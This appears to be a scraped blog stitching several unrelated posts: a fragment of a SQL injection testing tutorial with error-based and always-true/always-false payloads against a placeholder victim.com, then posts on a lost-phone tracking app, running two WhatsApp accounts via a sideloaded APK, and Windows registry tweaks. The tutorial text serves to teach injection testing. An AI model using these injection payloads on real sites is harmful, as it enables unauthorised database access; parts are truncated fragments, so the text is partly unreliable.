errors returned from the database. The first one generates an error converting a string to an
integer:
http://www.victim.com/showproducts.aspx?category=bikes' and 1=0/@@version;--
Application response:
Server Error in '/' Application.
Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 – 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft
Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: ) ' to a column of data type int.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information
about the error and where it originated in the code.
The database reported an error, converting the result of @@version to an integer and displaying its contents. This technique abuses the type conversion functionality in SQL Server. We sent 0/@@version as part of our injected code. As a division operation needs to be executed between two numbers, the database tries to convert the result from the @@version function into a number. When the operation fails the database displays the content of the variable.
You can use this technique to display any variable in the database. The following |
example
uses this technique to display the user variable:



MySQL Errors
A common configuration is formed by an Apache Web server running PHP on a Linux operating system, but you can find it in many other scenarios as well. The following error is usually an indication of a MySQL injection vulnerability:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/victim.com/showproduct.php on line 8

In this example, the attacker injected a single quote in a GET parameter and the PHP page sent the SQL statement to the database. The following fragment of PHP code shows the vulnerability:
<?php
//Connect to the database
mysql_connect("[database]", "[user]", "[password]") or
//Error checking in case the database is not accessible
die("Could not connect: " . mysql_error());
//Select the database
mysql_select_db("[database_name]");


When an application running the preceding code catches database errors and the SQL query fails, the returned HTML document will include the error returned by the database. If an attacker modifies a string parameter by adding a single quote the server will return
output similar to the following:
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

The preceding output provides information regarding why the SQL query failed. If the
injectable parameter is not a string and therefore is not enclosed between single quotes, the
resultant output would be similar to this:
Error: Unknown column 'attacker' in 'where clause'


**********************
Learn more on => SQL injection Contd......
************************************************

Oracle Errors

When tampering with the parameters of Java applications with an Oracle back-end
database you will often find the following error:
java.sql.SQLException: ORA-00933: SQL command not properly ended at
oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:180) at
oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208)
The preceding error is very generic and means that you tried to execute a syntactically
incorrect SQL statement. Depending on the code running on the server you can find the
following error when injecting a single quote:
Error: SQLException java.sql.SQLException: ORA-01756: quoted string not
properly terminated
In this error the Oracle database detects that a quoted string in the SQL statement is not
properly terminated, as Oracle requires that a string be terminated with a single quote. The
following error re-creates the same scenario in .NET environments:
Exception Details: System.Data.OleDb.OleDbException: One or more errors
occurred during processing of command.
ORA-00933: SQL command not properly ended
The following example shows an error returned from a .NET application


sql injection payload => bikes’ or ‘1’=’1?  to make always true


In this example, we injected SQL code that created a meaningful correct query. If the
application is vulnerable to SQL injection, the preceding query should return every row in
the products table. This technique is very useful, as it introduces an always true condition.
‘ or ‘1’=’1 is inserted inline with the current SQL statement and does not affect the
other parts of the request. The complexity of the query doesn’t particularly matter, as we can
easily create a correct statement.

Another test to perform in this kind of situation is the injection of an always false
statement.
For that we will send a value that generates no results; for example, bikes’
AND ‘1’=’2:
SELECT *
FROM products
WHERE category='bikes' AND '1'='2' /* always false -> returns no rows */
54 Chapter 2 • Testing for SQL Injection
The preceding statement should return no results, as the last condition in the WHERE
clause can never be met. However, keep in mind that things are not always as simple as shown
in these examples, and don’t be surprised if you inject an always false condition and the
application
returns results

IMP =>
Parameter manipulation

Mitigation =>
Output encoding
validation
sanitization

**********************
Learn more on => SQL injection Contd......
************************************************

How to find STOLEN or LOST android phone

This blog of mine will be liked and loved by all the people who love their ANDROID phones / tabs

SO what i gonna tell you is that how to find or search your lost and stolen mobile :)

phone can be stolen or lost or misplaced anytime anywhere and by anyone
and sometimes no one is there to help you and people come just for sympathy
"OH ! its so sad your 40,000/- mobile lost"
"OMG how could you misplace your mobile in the shop"

and what we do is shed some tears take help from police and or any computer engineers and in response we get nothing and have to buy a small phone or less valuable phone that we brought before :(

A mobile phone is what for us ??

* A friend that makes us time-pass when we are bored
** A place were we keep our secrets
*** A place were we have many memories in text (sms) or in pics (photos)
**** A helper when you are late coming to home
***** Nights talks and love sharing with wife or girlfriend
****** Keep you in touch with all the people you want in your life and much more

SO all these things made possible by phone so must have small security for care

HERES' THE SECRET

Download an APP name call ANDORID LOST

Download or install app => Click on me :)

***********
how to download apk file of android => click on me :))
**********************

so after installing this app you need
1) a gmail account
2) synchronize that gmail account in your phone
3) you can also install help of play store present in your phone

Features of ANDROID LOST app
when your phone is lost what all you can do help of this app 

*read message
** read call history
*** raise alarm
**** get mobile location
***** get imei no.
****** get photo of rear and front camera
******* lock phone change pic
******** delete everything u have in your data sd card
********* make phone silent and vibrate
and much more more u want :: u can read ever thing in detail over here  click on me :)

NOW WHAT YOU HAVE TO DO AFTER INSTALLING THIS APP ??

after installing this

* synchronize your phone with gmail id
** go to the website Android lost or Click on me :) and sign in the website and track your mobile simple
just 3 steps and you can trace your mobile phone

Here is the Video tutorial :: How to use Android lost app

Click on me :)
Installing tutorial => Click on me :)
How to use it Detail Click on me :)

SO keep your phone SAFE
Just one app helps you alot so no need of taking help and finding your self in a question "Now what i DO ?"

Be Safe and be Ethical
Pprasoon Nigam
Security Expert

How to use two WhatsApp in one Android device

How to use two WhatsApp on one Android phone

or

Use two WhatsApp without rooting up mobile phone 

many of u thinking am i joking or kidding, is it really true if yes then tell me how?

Why two whatsapp

* to make urself different
** to keep some people away from ur personal no.
*** want to have personal no. with personal whatsapp for ur lover
**** just to show yeah i can do this i have two whats app
****** mobile is not rooted up (no rooting is needed) so u can safe ur warranty and gurrantey

now how to do it that's the important part

HERE'S THE SECRET
*********************
tag all ur friend in comment in one click => Click on me :))
protect ur computer with virus and trojans => Click on me :))
***********************************************

first of all back up all ur chats of whats app

Steps

Go to setting => then to chat setting and click on backup option
after backing up ur whatsapp

*** go to setting to the apps setting and uninstall ur whatsapp

**** when u have unistalled then go to storage => phone storage and find WhatsApp folder

rename ur WhatsApp folder to WhatsAppold
** as if u have renamed ur whatsapp now install a new whatsapp from playstore open it up and put ur new number ( mobile number in it) then continue and agree all the terms do all that stuff; u do to register in whatsapp but remember with ur new phone no.

::: ** NOW HERE THE IMP PART FOR THE REGISTER FOR SECOND WHATSAPP NO.

now go to storage and into phone storage 

=>>> now rename ur whatsappold folder to OGWhatsApp

  Rename  "WhatsAppold => OGWhatsapp"

not download this apk file names "OGWhatsApp"

to download OGWhatsApp => Click on me :)


** Now install the OGWhatsapp help of apk file i have given u and then register ur self with ur prvious no. (or the old no.) and here you go with two whatsapp with two different no.

************
wifi hacking GUI software in backtrack => Click on me :))
cracking hash codes with backtrack => Click on me :))
************************

Summary

*.* WhatsApp have ur new no. registered
*.*       OGWhatsApp have ur old no. registered
*.*             if u want u can do vice versa but u will mess up with backup data

20 little tricks and hacks for all Windows O.S

20 tricks and hacks for all Windows O.S

PC & laptop to make it run the way you want

Lets take you through the hidden  tweaks in Windows

Treaking enables you to make Windows do interesting and useful things that it doesn't necessarily do directly out of the box.

Some tweaks are easier to action than others but all of them help you to customize your PC and make it run closer to the way you'd like.

HERES' THE SECRET

*. Remove programs from Open with…

You can remove unwanted programs that appear on the Open with… list when you're trying to open an unknown program.

In the Registry, browse to HKEY_CLASSES_ ROOT\Applications and you'll see a list of programs installed on your PC as subkeys in the left-hand pane.

To remove an unwanted program from this list, select it and then right-click in the right-hand pane. Choose New > String Value, and name it "NoOpenWith".


**. Copy to folder

Add a "Copy to folder" option to the context menu so you can right-click a file to quickly copy it.

In Registry Editor, browse to HKEY_CLASSES_ ROOT\AllFilesystemObjects\shellex\ContextMenu Handlers, and create a new key called Copy to.

Change its (Default) value to "" and check it works.



***. Move to folder

You can also add a "Move to folder" option in this way.

From the same ContextMenuHandlers key as in tip 2, create a new key called "Move to" and change its (Default) value to "".

****. Quick folder Properties

To move quickly to a folder's Properties dialog, double-click it and hold down [Alt].


*****. Correct file sorting

By default, a file named 2.jpg is sorted after one called 20.jpg. Many people work around this by starting single digit numbers in file names with a leading zero, but you can change this behaviour by making a Registry edit.

Browse to the Registry key HKEY_CURRENT_USER\Software\ Microsoft\Windows\CurrentVersion\Explore.

Then create a new DWORD value and name it "NoStrCmpLogical". Right-click and modify its value to "1".

V*. Change the mouse pointer in Vista and Windows 7

Right-click the desktop and choose Personalize > Mouse Pointers. Select the scheme you want to use from the drop-down list. You can modify individual pointers by selecting one in the current scheme and clicking Browse – then replace this with any static cursor file with the extension .CUR, or an animated cursor file, which will have the .ANI file extension.

You can also download sets of mouse pointers online. These are generally distributed in sets of .CUR or .ANI files, grouped together in a zip archive. Download the file, unzip it and then replace the pointers you want to with the new files as in the above tip. A good place to start looking is here.

You can also make your own cursor files by creating suitable bitmap images in a graphics program and saving them with the .CUR extension.


V**. Mouse pointers in XP

To change the mouse pointer scheme in Windows XP, open Control Panel and switch to Classic View. Double-click Mouse and choose the Pointer tab.

V***. Send To expansion

When you right-click a file or folder in Windows 7 and choose Send To, there's a limited number of options. But hold down [Shift] as you right-click and you'll open an expanded menu containing My Documents, Downloads and more useful locations.

V****. Edit your theme

Right-click anywhere on the desktop and choose Personalize > Theme. Select an option from the drop-down list to use an existing theme.

Alternatively, choose "Window Colour and Appearance", open the Classic Appearance dialog to select a classic scheme and modify fonts and colours. Click Advanced. Pick the item you want to modify and enter the new colour or font.

VV. Folder toolbar

This tweak enables you to turn any folder on your hard drive into a toolbar, similar to the Quick Launch toolbar that gives you quick and easy access to the folder's contents.

First, minimise all your open windows, then move the mouse pointer to the Taskbar and right-click it. Choose Toolbars > New Toolbar from the expanding menu, which will launch the New Toolbar dialog.

Now select the item you want to use as a toolbar. If necessary, browse through My Documents or My Computer to find the folder you want. Alternatively, you can click "Make new folder" to create a custom one with specific contents.

Click OK, and your new toolbar appears as a button on the Windows Taskbar, then click this to see an expanding menu of its contents. Sub-folders also become their own expanding menus, and you can then select a particular file to open it in its associated application.

VV*. Active windows

Press [Alt] + [Esc] to cycle through your active items in the order in which they were opened. Then press [Alt] + [Tab] to pick the window you want to work on.

VV**. Hanging time

By default, Windows waits for five seconds to allow time for any hung applications to be closed when you shut down your computer.

If you want to reduce this period of time slightly, you can change the length with a quick Registry edit, so browse to HKEY_CURRENT_ USER\Control Panel\Desktop. In Vista, create a string entry called "HungAppTimeout" (if you use XP, it's already there).

Right-click this and choose Modify. The number is in milliseconds, so the default of 5000 equates to a wait of five seconds. If you're using Windows 7, you should avoid using this tweak, because it causes glitches.

VV***. Tweak performance

1. Best performance

Choose Start, right-click Computer and go to Properties > Advanced system settings. In Performance, click Settings > Visual Effects. Tick "Adjust for best performance". This removes most animations to improve PC performance.

2. Processor scheduling

In the Advanced tab, both Processor Scheduling and Memory usage are optimised for programs' performance. Change to Background services and System cache if you use your PC as a server, and programs' performance is secondary.

3. Virtual memory

In Virtual Memory, click Change > Custom size, and enter an upper and lower limit for your virtual memory. Try one and a half times the amount of RAM as your lower limit, and two to three times your RAM for the upper limit.

VV****. Disable paging file
If you're running a 64-bit version of Windows, have more than 4GB RAM installed, and don't perform memory-intensive operations, you could improve performance by disabling the paging file. In "Advanced system settings", choose Performance > Advanced, click Change under Virtual memory and choose "No paging file".

VVV. Clear paging file at shutdown

Windows uses the paging file on your hard drive as if it were RAM, and this routinely holds temporary data to free up your RAM. When you shut down your PC, this file is normally preserved, which can lead to inefficiency, because it slowly clutters up your system.

If your data is sensitive, this could also be a security threat, since it remains accessible even after you've deleted or destroyed the files it contains.

This edit flushes out the swap file whenever you shut down. Open the Registry Editor and browse to the key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management.

This contains a number of configurations for RAM and virtual memory. Either create or modify the DWORD value called "ClearPageFileAtShutdown", which defines whether the memory flush happens. To turn it on, set the value to "1".

VVV*. Quick access to Task Manager

You may be used to accessing Task Manager by pressing [Ctrl] + [Alt] + [Del] and then selecting it from the resulting screen. You can also get quick access to it that's less intrusive, however – rightclick the Taskbar and choose Task Manager.

VVV**. Change user picture

Click the Start button and then click your user picture. In the resulting dialog, choose Change your picture > Browse for more pictures. Locate the photo you want to use and click OK. Click Change Picture, followed by OK to confirm your choice.

VVV***. Autohide the Taskbar

You can free up more screen space by hiding the Taskbar. Right-click it, choose Properties and select Auto-hide. To access it when you want it, just drag the mouse to the bottom of your screen and it'll pop up.

VVV****. Get past the welcome screen

You can automatically log on and bypass the welcome screen with this simple tweak. Choose Start > Run and type "control userpasswords2" into the Open bar.

Click OK to see a dialog with each user installed on the PC. Clear the box marked "Users must enter a username and password to use this computer". Click OK. Now restart, and you'll go directly to your desktop.
©Prasoon nigam
XX. Custom keyboard shortcuts
Works with: XP, Vista, Windows 7

Create keyboard shortcuts to launch any program shortcut. Right-click the shortcut icon and choose Properties. Select the Shortcut key box and press a letter on the keyboard, (such as [H]) and click OK. Now [Ctrl] + [Alt] + [H] will launch the shortcut.